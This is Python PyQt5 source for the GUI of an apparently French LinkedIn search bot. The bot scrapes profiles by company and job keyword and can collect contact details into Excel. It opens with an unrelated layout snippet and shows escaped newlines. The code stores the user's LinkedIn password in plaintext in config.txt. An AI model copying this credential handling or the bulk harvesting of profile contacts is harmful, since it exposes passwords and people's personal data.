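grid = QtWidgets.QGridLayout(window)
grid.addWidget(QtWidgets.QLabel("row 0, col 0"), 0, 0, 1, 1)
grid.addWidget(QtWidgets.QLabel("row 1, spans 2 columns"), 1, 0, 1, 2)
window.show()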
self.status_bar.setObjectName(\"status_bar\")\n self.setStatusBar(self.status_bar)\n\n ############# menu bar #############\n menu = QtWidgets.QMenuBar(self.central_widget)\n menu.setStyleSheet(\"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n optionMenu = menu.addMenu('&Options')\n self.audioAct = QtWidgets.QAction('Audio', self.central_widget)\n self.audioAct.setCheckable(True)\n self.audioAct.setStatusTip('Emettre un son à la fin de la recherche')\n self.audioAct.setChecked(False)\n # self.audioAct.triggered.connect(self.toggleMenu)\n # exitAct = QtWidgets.QAction('Quitter',self.central_widget)\n # exitAct.setShortcut('Ctrl+Q')\n # exitAct.setStatusTip(\"Quitte l'application\")\n # exitAct.triggered.connect(app.quit)\n # optionMenu.addAction(exitAct)\n self.progress_auto_quit_Act = QtWidgets.QAction('Auto-fermeture Progression', self.central_widget)\n self.progress_auto_quit_Act.setCheckable(True)\n self.progress_auto_quit_Act.setStatusTip('Ferme la barre de progression à la fin de la recherche')\n self.progress_auto_quit_Act.setChecked(False)\n # self.progress_auto_quit_Act.triggered.connect(self.toggleMenu)\n optionMenu.addAction(self.audioAct)\n optionMenu.addAction(self.progress_auto_quit_Act)\n\n # Ajoute un menu secondaire pour les options de recherche\n recherche_option_menu = QtWidgets.QMenu('Options de Recherche', self.central_widget)\n recherche_option_menu.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n\n # Ajoute un menu tertiaire pour les types de poste recherché\n recherche_option_type_poste_menu = QtWidgets.QMenu('Type de Poste', self.central_widget)\n recherche_option_type_poste_menu.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.518, y1:0, x2:0.50705, \"\n \"y2:0.517, stop:0 rgba(207, 211, 214, 255), stop:0.995025 rgba(250, 250, 250, 255));\\n \"\n \"selection-color: rgb(0, 0, 0); \\n selection-background-color: rgb(0, 170, 255);\")\n # Crée les action déterminant le type de poste\n self.recherche_type_both_Act = QtWidgets.QAction('Actuel + Auparavant', self.central_widget)\n self.recherche_type_both_Act.setCheckable(True)\n self.recherche_type_both_Act.setStatusTip(\"Recherche globale sur l'entreprise: Poste Actuel et Passé\")\n self.recherche_type_both_Act.setChecked(True)\n self.recherche_type_both_Act.setObjectName(\"Actuel+Auparavant\")\n self.recherche_type_both_Act.triggered[bool].connect(self.select_recherche_type)\n\n self.recherche_type_actuel_Act = QtWidgets.QAction('Actuel', self.central_widget)\n self.recherche_type_actuel_Act.setCheckable(True)\n self.recherche_type_actuel_Act.setStatusTip(\"Recherche contrainte sur l'entreprise: Poste Actuel uniquement\")\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_actuel_Act.setObjectName(\"Actuel\")\n self.recherche_type_actuel_Act.triggered[bool].connect(self.select_recherche_type)\n\n self.recherche_type_auparavant_Act = QtWidgets.QAction('Auparavant', self.central_widget)\n self.recherche_type_auparavant_Act.setCheckable(True)\n self.recherche_type_auparavant_Act.setStatusTip(\"Recherche contrainte sur l'entreprise: 
Poste Passé uniquement\")\n self.recherche_type_auparavant_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setObjectName(\"Auparavant\")\n self.recherche_type_auparavant_Act.triggered[bool].connect(self.select_recherche_type)\n\n # Détermine si on récupère les coordonnées dans les profils\n self.optionProfil = QtWidgets.QAction('Coordonnées', self.central_widget)\n self.optionProfil.setCheckable(True)\n self.optionProfil.setStatusTip(\"Récupérer les coordonnées disponibles sur le profil\")\n self.optionProfil.setChecked(True)\n\n # Construit l'architecture des menus\n recherche_option_menu.addAction(self.optionProfil)\n recherche_option_type_poste_menu.addAction(self.recherche_type_both_Act)\n recherche_option_type_poste_menu.addAction(self.recherche_type_actuel_Act)\n recherche_option_type_poste_menu.addAction(self.recherche_type_auparavant_Act)\n\n recherche_option_menu.addMenu(recherche_option_type_poste_menu)\n optionMenu.addMenu(recherche_option_menu)\n\n self.recherche_type = 'Actuel+Auparavant' # Valeur par défaut\n\n ############## Choix du navigateur ######################\n self.titre_navigateur = QtWidgets.QLabel(self.central_widget)\n self.titre_navigateur.setStyleSheet(\"font: 87 11pt \\\"Arial Black\\\";\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, \"\n \"x2:0.517, y2:1, stop:0 rgba(186, 230, 255, 0), \"\n \"stop:0.995025 rgba(250, 250, 250, 0));\")\n # StyleSheet background-color pour transparence\n self.titre_navigateur.setObjectName(\"titre_navigateur\")\n self.gridLayout.addWidget(self.titre_navigateur, 0, 2, 1, 1)\n\n self.combo_box = QtWidgets.QComboBox(self.central_widget)\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(11)\n font.setBold(True)\n font.setWeight(75)\n self.combo_box.setFont(font)\n self.combo_box.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.517413, y1:0, x2:0.512, y2:0.494, \"\n \"stop:0 rgba(192, 192, 192, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"border-color: rgb(15, 15, 15);\\n\"\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(192, 192, 192, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"selection-color: rgb(0,0,0);\")\n self.combo_box.setIconSize(QtCore.QSize(30, 30))\n self.combo_box.setObjectName(\"combo_box\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"firefox1600.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n # Icon dans le dossier de l'application\n self.combo_box.addItem(icon, \"\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(\"chrome1600.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n # Icon dans le dossier de l'application\n self.combo_box.addItem(icon1, \"\")\n\n self.navigateur = \"Firefox\" # Fixe le navigateur sur Firefox par défaut\n self.combo_box.setCurrentIndex(0)\n self.combo_box.activated[str].connect(self.nav_activated)\n # Quand combo_box activé récupère l'onglet choisit par l'intermédiaire de NavActivated\n self.combo_box.setToolTip('Choisissez le navigateur installé sur votre ordinateur')\n self.gridLayout.addWidget(self.combo_box, 1, 2, 1, 1)\n\n ################## Identification Linkedin ################\n self.titre_id_linkedin = QtWidgets.QLabel(self.central_widget)\n font = QtGui.QFont()\n font.setFamily(\"Arial Black\")\n font.setPointSize(11)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(10)\n self.titre_id_linkedin.setFont(font)\n self.titre_id_linkedin.setStyleSheet(\"font: 87 11pt \\\"Arial 
Black\\\";\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, \"\n \"y2:1, stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0)\"\n \");\")\n self.titre_id_linkedin.setObjectName(\"titre_id_linkedin\")\n self.gridLayout.addWidget(self.titre_id_linkedin, 0, 1, 1, 1)\n\n ## Identifiant linkedin ##\n self.identifiant = QtWidgets.QLineEdit(self.central_widget)\n\n self.identifiant.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(209, 209, 209, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 12pt \\\"Arial\\\";\\n\"\n \"alternate-background-color: rgb(255, 255, 255);\")\n\n self.identifiant.setToolTip(\n \"
    Entrez votre adresse mail de connexion à Linkedin
    \")\n self.identifiant.setObjectName(\"identifiant\")\n self.identifiant.setPlaceholderText('Adresse Email')\n # Affiche un texte quand pas encore d'input dans le LineEdit\n self.gridLayout.addWidget(self.identifiant, 1, 1, 1, 1)\n\n ## Mot de passe linkedin ##\n self.password = QtWidgets.QLineEdit(self.central_widget)\n self.password.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(209, 209, 209, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 12pt \\\"Arial\\\";\")\n self.password.setToolTip(\n \"
    Entrez votre mot de passe de connexion à Linkedin
    \")\n self.password.setObjectName(\"password\")\n self.password.setEchoMode(2) # EchoMode= 2 Pour afficher l'input en *****\n self.password.setPlaceholderText('Mot de passe') # Affiche un texte quand pas encore d'input dans le LineEdit\n self.gridLayout.addWidget(self.password, 2, 1, 1, 1)\n\n ################ Recherche #####################\n ##Grille secondaire pour paramètre de recherche ##\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n\n self.titre_recherche = QtWidgets.QLabel(self.central_widget)\n self.titre_recherche.setStyleSheet(\"font: 87 10pt \\\"Arial Black\\\"\\n;\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, \"\n \"y2:1, stop:0 rgba(186, 230, 255, 0), \"\n \"stop:0.995025 rgba(250, 250, 250, 0));\")\n self.titre_recherche.setObjectName(\"titre_recherche\")\n self.gridLayout.addWidget(self.titre_recherche, 3, 1, 1, 1)\n\n ## Recherche nom entreprise ##\n # Titre\n self.society = QtWidgets.QLabel(self.central_widget)\n self.society.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"text-decoration: underline;\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.society.setObjectName(\"society\")\n self.gridLayout_2.addWidget(self.society, 1, 0, 1, 2)\n # Champ\n self.societe_champ = QtWidgets.QLineEdit(self.central_widget)\n self.societe_champ.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.societe_champ.setObjectName(\"societe_champ\")\n self.societe_champ.setToolTip(\n \"
    Nom de l'entreprise recherchée
    \")\n self.gridLayout_2.addWidget(self.societe_champ, 2, 0, 1, 2)\n\n ## Recherche localisation ##\n # Titre\n self.localisation = QtWidgets.QLabel(self.central_widget)\n self.localisation.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"text-decoration: underline;\\n\"\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.localisation.setObjectName(\"localisation\")\n self.gridLayout_2.addWidget(self.localisation, 3, 0, 1, 2)\n # Champ\n self.localisation_champ = QtWidgets.QLineEdit(self.central_widget)\n self.localisation_champ.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.localisation_champ.setObjectName(\"localisation_champ\")\n self.localisation_champ.setToolTip(\n \"
    Localisation de l'entreprise ou mot clé additionnel
    \")\n self.gridLayout_2.addWidget(self.localisation_champ, 4, 0, 1, 2)\n\n ## liste des keywords pour les postes recherchés ##\n # Titre\n self.poste_keyword = QtWidgets.QLabel(self.central_widget)\n self.poste_keyword.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"background-color: rgb(255, 255, 255);\\n\"\n \"text-decoration: underline;\")\n self.poste_keyword.setObjectName(\"poste_keyword\")\n self.gridLayout_2.addWidget(self.poste_keyword, 5, 0, 1, 1)\n\n # Récupération des keywords et affichage dans un ListWidget\n self.listWidget = QListWidget(self.central_widget)\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setToolTip(\n \"
    Selectionnez les postes clés recherchés
    \")\n\n # Récupère liste de keywords dans fichier texte correspondant dans le dossier de l'application\n keywords = self.get_keywords('keywords-poste.txt')\n if keywords:\n for keyword in keywords:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked) # Coche par défaut tous les keywords extraits du fichier txt\n item.setText(keyword)\n self.listWidget.addItem(item) # Ajoute les keywords dans le listWidget\n self.gridLayout_2.addWidget(self.listWidget, 6, 0, 1, 1)\n\n ## liste des keywords pour les mots clés à éviter ##\n # Titre\n self.poste_antikeyword = QtWidgets.QLabel(self.central_widget)\n self.poste_antikeyword.setStyleSheet(\"font: 9pt \\\"Arial\\\";\\n\"\n \"background-color: rgb(255, 255, 255);\\n\"\n \"text-decoration: underline;\")\n self.poste_antikeyword.setObjectName(\"poste_antikeyword\")\n self.gridLayout_2.addWidget(self.poste_antikeyword, 5, 1, 1, 1)\n\n # Récupération des keywords et affichage dans un ListWidget\n self.listWidget2 = QListWidget(self.central_widget)\n self.listWidget2.setObjectName(\"listWidget2\")\n self.listWidget2.setToolTip(\n \"
    Selectionnez les domaines à éviter
    \")\n\n # Récupère liste de keywords à éviter dans fichier texte correspondant dans le dossier de l'application\n keywords = self.get_keywords('antikeywords-poste.txt')\n if keywords:\n for keyword in keywords:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked) # Coche par défaut tous les keywords extraits du fichier txt\n item.setText(keyword)\n self.listWidget2.addItem(item) # Ajoute les keywords dans le listWidget\n self.gridLayout_2.addWidget(self.listWidget2, 6, 1, 1, 1)\n\n # Ajoute la grille secondaire à la grille principale\n self.gridLayout.addLayout(self.gridLayout_2, 4, 1, 1, 2)\n\n ################# Chemin output ##############\n self.output_file = QtWidgets.QLineEdit(self.central_widget)\n self.output_file.setText('')\n self.output_file.setPlaceholderText('Chemin du fichier Excel') # Texte quand pas d'input\n self.gridLayout.addWidget(self.output_file, 7, 1, 1, 1)\n\n self.parcourir = QtWidgets.QPushButton(self.central_widget)\n self.parcourir.setText('Parcourir')\n self.parcourir.resize(self.parcourir.sizeHint())\n self.gridLayout.addWidget(self.parcourir, 7, 2, 1, 1)\n self.parcourir.clicked.connect(self.output) # Récupère le fichier excel d'output\n\n ############# Lancement du bot ###############\n self.lancement = QtWidgets.QPushButton(self.central_widget)\n self.lancement.setStyleSheet(\n \"background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.104478 rgba(255, 255, 255, 255), stop:1 rgba(27, 192, 2, 255));\\n\"\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0.134328 rgba(27, 192, 2, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"font: 75 12pt \\\"MS Shell Dlg 2\\\";\")\n self.lancement.setObjectName(\"lancement\")\n self.lancement.clicked.connect(self.bot) # Lance l'application de recherche linkedin\n self.gridLayout.addWidget(self.lancement, 9, 1, 1, 1)\n\n ################## Stoppe le bot ####################\n self.stop = QtWidgets.QPushButton(self.central_widget)\n self.stop.setToolTip(\"Stoppe la recherche\")\n self.stop.setStyleSheet(\n \"selection-background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(192, 0, 0, 255), stop:1 rgba(255, 255, 255, 255));\\n\"\n \"background-color: qlineargradient(spread:reflect, x1:0.493, y1:0.528, x2:0.497, y2:0, \"\n \"stop:0 rgba(255, 255, 255, 255), stop:1 rgba(192, 0, 0, 255));\\n\"\n \"font: 75 12pt \\\"MS Shell Dlg 2\\\";\")\n self.stop.setObjectName(\"stop\")\n self.gridLayout.addWidget(self.stop, 9, 2, 1, 1)\n self.stop.setEnabled(False)\n\n ############### logo ADENTIS #####################\n self.logo_adentis = QtWidgets.QLabel(self.central_widget)\n self.logo_adentis.setStyleSheet(\n \"background-color: qlineargradient(spread:pad, x1:0.518, y1:0, x2:0.517, y2:1, \"\n \"stop:0 rgba(186, 230, 255, 0), stop:0.995025 rgba(250, 250, 250, 0));\")\n self.logo_adentis.setText(\"\")\n self.logo_adentis.setPixmap(QtGui.QPixmap(\"Adentis_small2.png\")) # Logo dans le dossier de l'application\n self.logo_adentis.setObjectName(\"logo_adentis\")\n self.gridLayout.addWidget(self.logo_adentis, 2, 2, 2, 1, QtCore.Qt.AlignHCenter)\n\n ###### Recherche des Valeurs par défauts enregistrées############\n self.params = {'login:': \"\", 'password:': \"\", 'xlsx_path:': \"\", 'audio:': \"\", 'progress_quit:': \"\",\n 'option_profil:': \"\", 
'recherche_type:': \"\"}\n self.get_params()\n\n self.retranslateUi()\n self.show()\n\n def select_recherche_type(self, statut):\n sender = self.central_widget.sender()\n if statut is True:\n self.recherche_type = sender.objectName()\n if sender.objectName() == 'Actuel':\n self.recherche_type_both_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setChecked(False)\n elif sender.objectName() == 'Auparavant':\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_both_Act.setChecked(False)\n elif sender.objectName() == 'Actuel+Auparavant':\n self.recherche_type_actuel_Act.setChecked(False)\n self.recherche_type_auparavant_Act.setChecked(False)\n else:\n sender.setChecked(True) # On n'autorise pas le déchochage\n self.recherche_type = sender.objectName() # le type de recherche reste sur l'objet toujours coché\n # print(self.recherche_type)\n\n def get_params(self):\n if os.path.exists(os.path.join(os.getcwd(), 'config.txt')):\n with open(os.path.join(os.getcwd(), 'config.txt'), 'r') as f:\n for line in f:\n line = line.strip()\n self.params.update({param: line[line.index(param) + len(param):] for param in self.params.keys()\n if param in line})\n\n self.identifiant.setText(self.params['login:'])\n self.password.setText(self.params['password:'])\n self.output_file.setText(self.params['xlsx_path:'])\n if self.params['audio:'] == 'True':\n self.audioAct.setChecked(True)\n else:\n self.audioAct.setChecked(False)\n if self.params['progress_quit:'] == 'True':\n self.progress_auto_quit_Act.setChecked(True)\n else:\n self.progress_auto_quit_Act.setChecked(False)\n if self.params['option_profil:'] == 'True':\n self.optionProfil.setChecked(True)\n else:\n self.optionProfil.setChecked(False)\n\n if self.params['recherche_type:'] == 'Actuel':\n self.recherche_type_actuel_Act.trigger()\n elif self.params['recherche_type:'] == 'Auparavant':\n self.recherche_type_auparavant_Act.trigger()\n elif self.params['recherche_type:'] == 'Actuel+Auparavant':\n self.recherche_type_both_Act.trigger()\n\n def nav_activated(self, text: str):\n \"\"\"\n Slot permettant de récupérer le str renvoyé par le signal de la combo_box \"Choix du navigateur\"\n et de le sauver dans navigateur\n :param text:\n \"\"\"\n self.navigateur = text\n\n def retranslateUi(self):\n self.setWindowTitle(\"Recherche Linkedin\")\n self.titre_navigateur.setText(\"Navigateur\")\n\n self.lancement.setText(\"Lancement\")\n self.titre_id_linkedin.setText(\"Identification Linkedin\")\n __sortingEnabled = self.listWidget.isSortingEnabled()\n self.listWidget.setSortingEnabled(True)\n self.listWidget.setSortingEnabled(__sortingEnabled)\n self.listWidget2.setSortingEnabled(True)\n self.listWidget2.setSortingEnabled(__sortingEnabled)\n self.society.setText(\"Société\")\n self.poste_keyword.setText(\"Poste recherché\")\n self.poste_antikeyword.setText(\"Domaine à éviter\")\n self.localisation.setText(\"Localisation\")\n\n self.stop.setText(\"STOP\")\n self.combo_box.setToolTip(\"
    Choix du navigateur
    \")\n self.combo_box.setItemText(0, \"Firefox\")\n self.combo_box.setItemText(1, \"Chrome\")\n self.titre_recherche.setText(\"Paramètres de la Recherche\")\n\n def get_keywords(self, nom_fichier: str) -> list:\n \"\"\"\n Récupère les keywords par ligne dans le fichier texte spécifié dans nom_fichier\n :param nom_fichier:\n :rtype: list\n \"\"\"\n #\n if os.path.exists(os.path.join(os.getcwd(), nom_fichier)):\n with open(os.path.join(os.getcwd(), nom_fichier), 'r') as f:\n keywords = [l.strip() for l in f]\n else:\n keywords = []\n f = open(os.path.join(os.getcwd(), nom_fichier), 'w')\n f.close()\n self.status_bar.showMessage('Fichier source des mots clés de poste introuvable')\n return keywords\n\n def get_keywords_checked(self, listobject) -> list:\n \"\"\"\n Récupère les éléments cochés dans le QlistWidget listobject\n :rtype: list\n :param listobject:\n \"\"\"\n checked_items = []\n for index in range(listobject.count()):\n if listobject.item(index).checkState() == QtCore.Qt.Checked:\n checked_items.append(listobject.item(index).text())\n return checked_items\n\n def output(self):\n \"\"\"\n Affiche une fenêtre de dialogue de recherche de fichier et met à jour self.output_file\n \"\"\"\n # Choix du fichier Excel\n fname = QtWidgets.QFileDialog.getOpenFileName(QtWidgets.QFileDialog(), 'Choisir fichier', os.getcwd(),\n \"Excel files (*.xlsx *.xls)\")\n if fname[0]:\n self.output_file.setText(fname[0])\n\n def bot(self):\n \"\"\"\n Récupère self.output_file, self.identifiant, self.password, self.societe_champ, self.localisation_champ,\n self.optionprofil, self.navigateur, et les keywords et antikeywords\n Paramètres minimums :\n self.output_file.text() existe et est un fichier xls\n self.identifiant.text() est rempli\n self.password.text() est rempli\n self.societe_champ.text() est rempli\n Au moins un des keywords de self.listWidget est coché\n Appelle la classe Progression\n Appelle la classe TableTpsReel\n Appelle la classe Bot\n Met en place les connection entre les signaux provenant de Bot et les slot de mise à jour de Progression et\n des différent boutons de l'interface\n \"\"\"\n if os.path.isfile(self.output_file.text()) and 'xls' in os.path.splitext(self.output_file.text())[1] and len(\n self.identifiant.text()) > 0 and len(self.password.text()) > 0 and \\\n len(self.get_keywords_checked(self.listWidget)) > 0:\n\n # Sauve l'identifiant, le mot de passe et le chemin du fichier excel dans le fichier config.txt\n self.save_params()\n\n self.recherche = Bot(self.identifiant.text(), self.password.text(), self.societe_champ.text(),\n self.localisation_champ.text(), self.optionProfil.isChecked(),\n self.recherche_type, self.output_file.text(),\n self.get_keywords_checked(self.listWidget),\n self.get_keywords_checked(self.listWidget2),\n self.navigateur)\n self.progress = Progression(self.dim)\n try:\n self.table = TableTpsReel(self.output_file.text())\n except ValueError:\n self.progress.update_statut_recherche('Le Fichier Excel n\"est pas correctement formaté, Renseigner '\n 'au moins le nom des colonnes dans la première ligne')\n self.done()\n return\n\n # Signaux de mise à jour du label statut_recherche avec les message provenant de Bot et TableTpsReel\n self.recherche.c.update_statut_recherche[str].connect(self.progress.update_statut_recherche)\n self.table.update_statut_recherche[str].connect(self.progress.update_statut_recherche)\n # Signaux de mise à jour du label statut_page avec les message provenant de Bot\n 
self.recherche.c.update_statut_page[str].connect(self.progress.update_statut_page)\n self.recherche.c.add_page.connect(self.progress.addpage)\n # Signaux de mise à jour des paramètres de la barre de progression en fonction des infos tirées de Bot\n self.recherche.c.get_max[int].connect(self.progress.set_max)\n self.recherche.c.update_pbar.connect(self.progress.addstep)\n # Signaux de mise à jour de TableTpsReel à partir des infos tirées de Bot\n self.recherche.c.update_table[dict].connect(self.table.remplissage_table)\n # Mets à jour les messages et les états des boutons de l'interface quand Bot est terminé\n self.recherche.finished.connect(self.done)\n # Signaux d'arret de la recherche\n self.stop.clicked.connect(self.stop_recherche)\n self.progress.btn_pause.clicked[bool].connect(self.setpause)\n self.status_bar.showMessage('Recherche en cours')\n # Lance le thread de Bot\n self.recherche.start()\n # Une fois Bot lancé, rend le bouton stop accessible et le bouton lancement inaccessible\n self.stop.setEnabled(True)\n self.lancement.setEnabled(False)\n else:\n self.status_bar.showMessage('Certaines informations requises sont manquantes')\n\n def save_params(self):\n # Mets à jour le dictionnaire avec les données rentrées par l'utilisateur\n self.params['login:'] = self.identifiant.text()\n self.params['password:'] = self.password.text()\n self.params['xlsx_path:'] = self.output_file.text()\n\n if self.audioAct.isChecked():\n self.params['audio:'] = 'True'\n else:\n self.params['audio:'] = 'False'\n\n if self.progress_auto_quit_Act.isChecked():\n self.params['progress_quit:'] = 'True'\n else:\n self.params['progress_quit:'] = 'False'\n\n if self.optionProfil.isChecked():\n self.params['option_profil:'] = 'True'\n else:\n self.params['option_profil:'] = 'False'\n\n self.params['recherche_type:'] = self.recherche_type\n\n if os.path.exists(os.path.join(os.getcwd(), 'config.txt')):\n with open(os.path.join(os.getcwd(), 'config.txt'), 'w') as fw:\n for param in self.params.keys():\n fw.write('{}{}\\n'.format(param, self.params[param]))\n\n def stop_recherche(self):\n self.recherche.continueflag = False\n self.stop.setEnabled(False)\n\n def setpause(self, pressed):\n if pressed:\n self.progress.btn_pause.setIcon(QtGui.QIcon('playbuttonb.png'))\n self.progress.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.recherche.pauseflag = True\n else:\n self.progress.btn_pause.setIcon(QtGui.QIcon('pausebutton.png'))\n self.progress.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.recherche.pauseflag = False\n\n def done(self):\n \"\"\"\n Show the message that fetching posts is done.\n Disable Stop button, enable the Start one and reset progress bar to 0\n \"\"\"\n self.stop.setEnabled(False)\n self.lancement.setEnabled(True)\n self.progress.pbar.setValue(0)\n self.status_bar.showMessage('Recherche terminée')\n if self.progress_auto_quit_Act.isChecked():\n self.progress.close()\n if self.audioAct.isChecked():\n sound = glob(os.path.join(os.getcwd(), '*.mp3'))\n if len(sound) > 0 and os.path.isfile(sound[0]):\n mixer.init()\n mixer.music.load(sound[0])\n mixer.music.play()\n else:\n winsound.Beep()\n\n def closeEvent(self, e):\n if hasattr(self, 'recherche'):\n self.stop.clicked.connect(self.stop_recherche)\n while self.recherche.isFinished() is False:\n time.sleep(1)\n if hasattr(self, 'table'):\n self.table.close()\n if hasattr(self, 'progress'):\n self.progress.close()\n e.accept()\n\n\nclass QListWidget(QtWidgets.QListWidget):\n def contextMenuEvent(self, e):\n cmenu = QtWidgets.QMenu(self)\n 
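# --- Illustrative sketch (not part of the original file): a minimal
# contextMenuEvent override, the same pattern this QListWidget subclass
# uses for its right-click menu; the action here is a stand-in.
from PyQt5 import QtWidgets

class ListWithMenu(QtWidgets.QListWidget):
    def contextMenuEvent(self, e):
        menu = QtWidgets.QMenu(self)
        add_act = menu.addAction("Add item")
        chosen = menu.exec_(self.mapToGlobal(e.pos()))  # modal popup at cursor
        if chosen == add_act:
            self.addItem("new item")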
cmenu.setStyleSheet(\"background-color: rgb(255, 255, 255);\\n\"\n \"selection-background-color : rgb(0,0,255);\")\n newAct = cmenu.addAction('Nouveau Mot clé')\n delAct = cmenu.addAction('Supprimer mot clé')\n action = cmenu.exec_(self.mapToGlobal(e.pos()))\n\n if self.objectName() == 'listWidget':\n nomfichier = 'keywords-poste.txt'\n elif self.objectName() == 'listWidget2':\n nomfichier = 'antikeywords-poste.txt'\n\n # Définit un context menu pour les list widget\n if action == newAct:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(\n QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.Checked)\n keyword, ok = QtWidgets.QInputDialog.getText(self, 'Nouveau mot clé', 'Mot clé')\n if ok:\n item.setText(keyword)\n self.addItem(item)\n if os.path.exists(os.path.join(os.getcwd(), nomfichier)):\n with open(os.path.join(os.getcwd(), nomfichier), 'a') as f:\n f.write('\\n{}'.format(keyword))\n\n elif action == delAct:\n listItems = self.selectedItems()\n if listItems:\n for item in listItems:\n self.takeItem(self.row(item))\n keyword = item.text()\n if len(keyword) > 0:\n noms_a_effacer = keyword.encode('utf-8')\n with open(nomfichier, 'rb') as f:\n with open(nomfichier, 'r+b') as g:\n ch = f.read()\n x = ch.find(noms_a_effacer)\n x = ch[0:x].rfind(b'\\n') + 1\n f.seek(x)\n g.seek(x)\n [g.write(ln) for ln in f if noms_a_effacer not in ln]\n g.truncate()\n\n\n############### Classe Interface Barre de progression #####################\nclass Progression(QtWidgets.QWidget):\n \"\"\"\n Definit une fenetre avec deux lignes :\n un label statut_recherche\n un label statut_page\n et une barre de progression\n \"\"\"\n\n def __init__(self, dim):\n super().__init__()\n width = 1300\n height = 160\n self.setGeometry(455,\n dim.height() - (height + 50), width, height)\n self.setWindowTitle('Recherche...')\n icon = QtGui.QIcon()\n # Icon dans le dossier de l'application\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n\n grid = QtWidgets.QGridLayout()\n grid.setSpacing(10)\n self.setLayout(grid)\n\n # Statut de la recherche\n self.statut_recherche = QtWidgets.QLabel('...', self)\n grid.addWidget(self.statut_recherche, 0, 0)\n\n # Bouton pause\n self.btn_pause = QtWidgets.QPushButton('', self)\n self.btn_pause.setIcon(QtGui.QIcon('pausebutton.png'))\n self.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.btn_pause.resize(self.btn_pause.sizeHint())\n self.btn_pause.setCheckable(True)\n # self.btn_pause.clicked[bool].connect(self.setpause)\n grid.addWidget(self.btn_pause, 2, 2)\n\n # Numéro de la page\n self.page_count = 1\n self.statut_page = QtWidgets.QLabel('Page ' + str(self.page_count), self)\n grid.addWidget(self.statut_page, 1, 0)\n\n # Barre de progression\n self.pbar = QtWidgets.QProgressBar(self)\n self.pbar.setValue(0)\n self.pbar.setMaximum(10)\n self.pbar.setObjectName(\"progressBar\")\n grid.addWidget(self.pbar, 2, 0, 2, 1)\n\n self.show()\n\n def set_max(self, val: int):\n \"\"\"\n Met à jour la valeur max de la barre de progression\n :param val:\n \"\"\"\n self.pbar.setMaximum(val)\n\n def addstep(self):\n \"\"\"\n Incrémente de 1 la barre de progression\n 